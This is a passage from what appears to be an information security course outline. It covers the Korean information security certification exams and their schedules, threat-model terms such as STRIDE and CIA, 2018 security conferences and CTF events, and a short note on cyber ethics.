  System security, network security, application security, general information security, information security management and law
• Practical (skill) test:
  Information security practice
• Schedule for examination
  1st/2nd: July 6th & Aug. 24th / Oct. 26th & Dec. 7th, 2013 for the written & skill tests
  7th/8th: Apr. 2nd & May 28th / Sep. 24th & Nov. 12th, 2016 for the written & skill tests
  » Application period: Feb. 29th ~ Mar. 4th, Aug. 22nd ~ 26th, 2016
Industrial Engineer in Information Security (정보보안산업기사): basic theory and practical ability to assist the work of an Information Security Engineer
[Weekly Hankook] Rising promising profession, information security specialist: prepare with the ‘Information Security Engineer’ and ‘Industrial Engineer in Information Security’ certificates
Any questions?
Hardships, The way of suffering
An unremitting effort, Sincerity, Diligence
---------------------------------------------------------------------
Expert, Specialist, Elite in Security
Summary
• Major threats: STRIDE
• Computer security: CIA
• Field experience study (actual practice)
  SecuInside 2018: CTF, CTB (Capture The Bugs) challenge
  July 14th~15th, Jam2Go, Gangnam-gu, Seoul (http://secuinside.com/2018/)
  ISEC 2018 (Information Security Conference), 12th Int’l Cyber Security Conf.
  Aug. 30th ~ 31st, COEX (http://www.isecconference.org/2018/)
  PoC 2018 (Power of Community)
  Nov. 8-9, Seoul (http://www.powerofcommunity.net)
• Cyber ethics is important
  The 10th Hacking Defense Contest, July 1, 2013: government-hosted ‘Hacking Defense Contest’ halted after just 4 hours
  “Sophisticated” British hacker faces 12 years in US jail for infiltrating Federal Reserve